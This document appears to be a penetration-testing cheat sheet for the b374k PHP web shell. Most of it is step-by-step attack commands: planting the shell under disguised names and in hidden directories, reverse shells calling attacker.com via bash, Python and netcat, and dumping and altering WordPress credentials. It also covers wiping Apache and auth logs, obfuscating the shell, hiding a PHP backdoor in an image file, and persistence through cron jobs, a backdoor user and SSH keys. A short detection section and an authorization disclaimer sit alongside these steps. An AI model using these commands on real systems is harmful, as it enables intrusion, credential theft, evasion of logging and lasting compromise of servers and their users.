b374k is a sophisticated PHP web shell used in penetration testing and post-exploitation scenarios. It provides file management, command execution, database interaction, and various network utilities through a single obfuscated PHP file. b374k offers both a web interface and command-line capabilities, making it useful for maintaining access and gathering intelligence on compromised systems.
b374k (originally named “b374k Shell”) is a single-file PHP application that provides:
- Web-based file manager and editor
- Command execution and reverse shell capabilities
- MySQL/database client
- Network utilities (port scanning, network analysis)
- PHP information gathering
- Log file manipulation
- System information collection
b374k is used exclusively in authorized penetration testing and lawful security assessments. Unauthorized access to computer systems is illegal. Always obtain written authorization before using b374k in any context.
# Clone from repository (if available)
git clone https://github.com/bl4ckh4t/b374k b374k-shell
# Or download from source
wget https://raw.githubusercontent.com/bl4ckh4t/b374k/master/shell.php
# Or find from legitimate security tool repositories
# (Only for authorized penetration testing)
# Upload to web-accessible directory
scp shell.php user@target.com:/var/www/html/admin/
# Or copy to compromised server
cp shell.php /var/www/html/
# Or embed in other files
cat shell.php >> legitimate_file.php
# Use inconspicuous filenames
cp shell.php error.php
cp shell.php index.php
cp shell.php upload.php
# Place in hidden directories
mkdir -p /var/www/html/.git/
cp shell.php /var/www/html/.git/shell.php
# Access through browser
http://target.com/shell.php
# With authentication
http://username:password@target.com/shell.php
# Through proxies
http://target.com/shell.php?proxy=http://proxy:8080
# b374k may require authentication
# Default credentials vary by version
# Common defaults: admin/admin, shell/shell
# Change password in PHP source
$AUTH_PASSWORD = 'newpassword';
# Bypass authentication (if vulnerable version)
# Some versions have authentication bypass vulnerabilities
| Feature | Description |
|---|
| File listing | View directory contents with permissions |
| File preview | View text files in web interface |
| Download | Download files from server to attacker machine |
| Upload | Upload files to server |
| Edit | Edit text files inline |
| Delete | Remove files from system |
| Rename | Rename files and directories |
| Permissions | Change file permissions (chmod) |
# Download sensitive files through interface
# Click file → Download
# Edit PHP files
# Click file → Edit → Modify code → Save
# Create new files
# New File button → Enter filename → Write content
# Delete logs
# Click access_log → Delete
# Change permissions on script
# Click script.php → Permissions → 755 → Apply
# Upload additional PHP shells
# Upload button → Select file → Upload
# Upload compiled binaries
# Upload button → netcat binary → Upload to /tmp/
# Upload multiple files at once
# Select multiple files → Batch upload
| Command | Purpose |
|---|
id | Get current user and group information |
whoami | Display current user |
pwd | Show current working directory |
ls -la | List files with detailed permissions |
uname -a | Display system information |
netstat -tulnp | Show listening ports and processes |
ps aux | List all running processes |
# Through web interface command tab
# Enter: cat /etc/passwd
# Execute
# Through command line if accessible
php -r 'system("id");'
# Chained commands
cat /etc/hosts && whoami && pwd
# Pipe output to tools
cat /etc/sudoers | grep NOPASSWD
# Check sudo privileges
sudo -l
# Find SUID binaries
find / -perm -4000 2>/dev/null
# Check kernel version
uname -a
# Look for writable files
find /tmp -type f -writable 2>/dev/null
# Bash reverse shell
bash -i >& /dev/tcp/attacker.com/4444 0>&1
# Python reverse shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker.com",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
# Netcat reverse shell
nc attacker.com 4444 -e /bin/bash
# On attacker machine
nc -nlvp 4444
# Using socat
socat file:`tty`,raw,echo=0 TCP-LISTEN:4444
# Using metasploit handler
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST attacker.com
set LPORT 4444
exploit
# MySQL connection
Host: localhost
User: root
Password: rootpass
Port: 3306
Database: wordpress
# Click Connect button in web interface
| Operation | Description |
|---|
| List databases | View all available databases |
| Select database | Choose database to query |
| List tables | View tables in database |
| Execute query | Run arbitrary SQL queries |
| Export data | Dump database contents |
| Modify data | Insert/update/delete records |
-- List all databases
SHOW DATABASES;
-- Select database
USE wordpress;
-- List tables
SHOW TABLES;
-- Dump user credentials
SELECT user_login, user_pass FROM wp_users;
-- Extract email addresses
SELECT user_email FROM wp_users;
-- Modify admin password
UPDATE wp_users SET user_pass=MD5('newpassword') WHERE ID=1;
# Scan target host
Host: 192.168.1.1
Port range: 1-65535
Type: TCP/UDP
# Common ports
80, 443, 22, 21, 3306, 5432, 8080, 8888
# Get network interfaces
ifconfig / ip addr
# Get routing table
route / ip route
# DNS lookup
nslookup domain.com
host domain.com
# Traceroute
traceroute example.com
| Command | Information |
|---|
phpinfo() | Complete PHP configuration |
php -v | PHP version |
extension_loaded() | Check for extensions |
php.ini | View PHP configuration file |
disable_functions | List disabled functions |
# Check if exec is disabled
php -r 'echo ini_get("disable_functions");'
# List loaded extensions
php -r 'print_r(get_loaded_extensions());'
# Check safe_mode status
php -r 'echo ini_get("safe_mode");'
# Get memory limit
php -r 'echo ini_get("memory_limit");'
# Apache access log
/var/log/apache2/access.log
/var/log/httpd/access_log
# Apache error log
/var/log/apache2/error.log
/var/log/httpd/error_log
# PHP error log
/var/log/php-fpm.log
/var/log/php.log
# System authentication log
/var/log/auth.log
/var/log/secure
# Clear Apache access logs
echo "" > /var/log/apache2/access.log
# Clear auth logs (if root)
echo "" > /var/log/auth.log
# Clear PHP errors
echo "" > /var/log/php.log
# Truncate syslog
truncate -s 0 /var/log/syslog
// Change authentication password
$AUTH_PASSWORD = 'ComplexPassword123!';
// Disable certain functions
$DISABLED_FUNCTIONS = array('system', 'exec');
// Change interface appearance
$INTERFACE_COLOR = '#333333';
// Limit accessible directories
$ROOT_DIR = '/var/www/';
# Base64 encode the entire shell
base64 shell.php > shell.b64
# PHP obfuscation
php_strip_whitespace() - remove comments
# Variable renaming
$_POST -> $____P0ST
# String concatenation
"system" -> "sys"."tem"
# Add shell to cron jobs
(crontab -l 2>/dev/null; echo "* * * * * php /tmp/shell.php") | crontab -
# Insert into Apache config
echo "RewriteRule ^(.*)$ /shell.php [L]" >> /etc/apache2/.htaccess
# Hide in image files
echo "<?php system($_POST['cmd']); ?>" >> image.jpg
# Hidden .htaccess shell
<FilesMatch "image\.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
# Hidden PHP files
.git/shell.php
.svn/shell.php
uploads/shell.php
wp-content/plugins/shell.php
# 1. Check current user and permissions
whoami && id
# 2. Enumerate system
uname -a && cat /etc/os-release
# 3. Find sensitive files
find /home -name "*.txt" -o -name "*.sql" 2>/dev/null
# 4. Check database access
mysql -u root -p -e "SHOW DATABASES;"
# 1. Find SSH keys
find / -name "id_rsa" -o -name "authorized_keys" 2>/dev/null
# 2. Check network connectivity
netstat -tulnp | grep LISTEN
# 3. Scan internal network
nmap -sn 192.168.1.0/24
# 4. Check ARP cache
arp -a
# 1. Create system user
useradd -m -s /bin/bash backdoor
# 2. Add SSH key
mkdir -p /home/backdoor/.ssh/
echo "ssh-rsa AAAA..." > /home/backdoor/.ssh/authorized_keys
# 3. Add cron job
(crontab -l; echo "*/5 * * * * /tmp/agent.sh") | crontab -
# 4. Verify persistence
crontab -l && cat ~/.ssh/authorized_keys
# Look for b374k signatures
grep -r "b374k" /var/www/
# Check for suspicious PHP files
find /var/www -name "*.php" -mtime -1
# Monitor web server logs
tail -f /var/log/apache2/access.log | grep "shell\|cmd\|execute"
# Check process lists
ps aux | grep php | grep -v apache
# Use non-standard ports
# Access through 8080, 8888, or custom ports
# Obfuscate filename
mv shell.php assets_loader.php
# Hide in legitimate directories
cp shell.php /var/www/html/wp-admin/temp.php
# Use URL encoding
http://target.com/shell.php?cmd=id%20%26%26%20cat%20/etc/passwd
| Issue | Solution |
|---|
| 404 File Not Found | Verify upload location and filename |
| Permission Denied | Check file permissions (should be readable) |
| Functions Disabled | Check php.ini disable_functions setting |
| Database Connection Failed | Verify credentials and network access |
| Authentication Failed | Check password in source code |
# Check PHP errors
tail -f /var/log/php-fpm.log
# Test PHP execution
php -r 'echo "PHP works";'
# Verify web server access
curl http://target.com/shell.php
# Check disable_functions
curl http://target.com/shell.php?info
# Record all access timestamps
# Log all commands executed
# Document findings and data accessed
# Maintain audit trail of activities
# Remove shell file
rm /var/www/html/shell.php
# Clear logs of access
# Restore original file permissions
# Remove added user accounts
# Delete cron jobs
Document:
- How shell was deployed
- Access methods used
- Commands executed
- Data accessed
- Recommendations for remediation
- Timeline of activities
| Tool | Comparison |
|---|
| Weevely | Python-based, more obfuscated, smaller shell |
| JSP Shells | Java-based, for Java application servers |
| ASP.NET Shells | Windows-focused, requires .NET framework |
| Reverse Shell Scripts | Simpler but less feature-rich |
- Original repository documentation
- OWASP Web Application Security Testing Guide
- Penetration Testing Execution Standard (PTES)
- CWE-94: Improper Control of Generation of Code
- MITRE ATT&CK: T1190 Exploit Public-Facing Application
